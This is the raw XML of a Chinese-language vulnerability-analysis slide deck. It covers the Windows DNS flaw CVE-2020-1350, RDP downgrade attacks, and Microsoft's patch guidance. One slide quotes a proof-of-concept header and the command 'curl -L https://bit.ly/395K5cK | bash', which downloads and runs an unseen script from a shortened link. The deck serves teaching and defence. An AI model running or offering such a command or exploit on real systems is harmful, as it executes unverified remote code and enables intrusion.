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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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13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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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25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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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16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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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01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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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96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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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1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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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7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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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893B-D325-43C9-A8AA-70B87318218B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8DE-C915-41B6-B2BC-DAB6F18C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60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4893B-D325-43C9-A8AA-70B87318218B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C8DE-C915-41B6-B2BC-DAB6F18C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5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漏洞分析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18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https://www.ithome.com.tw/news/131843</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="24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2" y="1121512"/>
            <a:ext cx="7990576" cy="523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92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78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https://www.ithome.com.tw/news/138909</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="28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138267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03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zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>美國國土安全部發布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史上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>第三次緊急指令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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88528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4869160"/>
            <a:ext cx="3575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CVE-2020-1350</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>漏洞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455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CVE-2020-1350</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>漏洞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46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2728" y="1196752"/>
            <a:ext cx="67687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#CVE-2020-1350</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t> Use at your own risk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t># follow me on twitter https://twitter.com/ZephrFish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# Auxiliary Info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>targetIp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>targetPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>=53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curl -L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https://bit.ly/395K5cK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>| bash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99592" y="537321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https://github.com/ZephrFish/CVE-2020-1350/blob/master/exploit.sh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404664"/>
            <a:ext cx="842493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到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>github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找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
              <a:t>CVE-2020-1350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POC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5893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/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>owershell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https://github.com/T13nn3s/CVE-2020-1350/blob/master/CVE-2020-1350-checker.ps1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72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5988" y="1772816"/>
            <a:ext cx="83644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KB4569509: Guidance for DNS Server Vulnerability CVE-2020-1350</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>https://support.microsoft.com/en-us/help/4569509/windows-dns-server-remote-code-execution-vulnerability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 install the security patch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Microsoft has released the security patch, you can download the patch here: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350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87624" y="332656"/>
            <a:ext cx="70395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KB=knowledge Base</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>知識庫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99318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RDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>DNS CVE-2020-1350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07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42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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>設備的用途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pc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>網路終端伺服器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" spc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Network Terminal Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" spc="-1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pc="-100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" spc="-100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>性問題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86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6190" y="712785"/>
            <a:ext cx="7460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如果終端伺服器（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Terminal Servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）配置不正確，那麼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Desktop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Protocal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，遠程桌面協議）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>連接就可能會面臨降級攻擊的危險。在這篇文章中，我們會使用一個名為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>rdp-downgrade.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>POC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>工具來演示降級攻擊。</a:t>
            </a:r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://kknews.cc/tech/g8n459.html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2797" y="2933929"/>
            <a:ext cx="17341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終端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>伺服器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Terminal Servers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96491" y="3580260"/>
            <a:ext cx="2847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RDP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Protocal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>遠程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>桌面協議</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="526017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威脅與攻擊分析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21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8877" y="593726"/>
            <a:ext cx="7886700" cy="861001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https://www.ithome.com.tw/news/137357</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0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51" y="1874335"/>
            <a:ext cx="7878845" cy="4495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59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50" y="282000"/>
            <a:ext cx="7886700" cy="96491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https://ithome.com.tw/news/135234</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000" dirty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11" y="1238420"/>
            <a:ext cx="8029974" cy="518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74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474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https://www.ithome.com.tw/tech/137791</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/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9" y="1129256"/>
            <a:ext cx="8294103" cy="5417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34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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terminal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遠端桌面連線 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Remote Desktop Services)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>說明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>遠端桌面連線是微軟從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows 2000 Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>開始提供的組件，但是並不是預設安裝的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/>
              <a:t>Windows XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows Server 2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中，微軟將此組件的啟動方法進行了改革，只需要通過簡單的設定就可以開啟遠端桌面連線功能。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47897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265</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 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漏洞分析</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>網路設備的用途</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>https://www.ithome.com.tw/news/137357</vt:lpstr>
      <vt:lpstr>https://ithome.com.tw/news/135234</vt:lpstr>
      <vt:lpstr>https://www.ithome.com.tw/tech/137791</vt:lpstr>
      <vt:lpstr>Terminal Server</vt:lpstr>
      <vt:lpstr>https://www.ithome.com.tw/news/131843</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>https://www.ithome.com.tw/news/138909</vt:lpstr>
      <vt:lpstr>美國國土安全部發布史上第三次緊急指令</vt:lpstr>
      <vt:lpstr>CVE-2020-1350漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>使用Powershell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漏洞分析</dc:title>
  <dc:creator>KSUIE</dc:creator>
  <cp:lastModifiedBy>KSUIE</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-20T03:36:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-20T04:31:53Z</dcterms:modified>
</cp:coreProperties>
</file>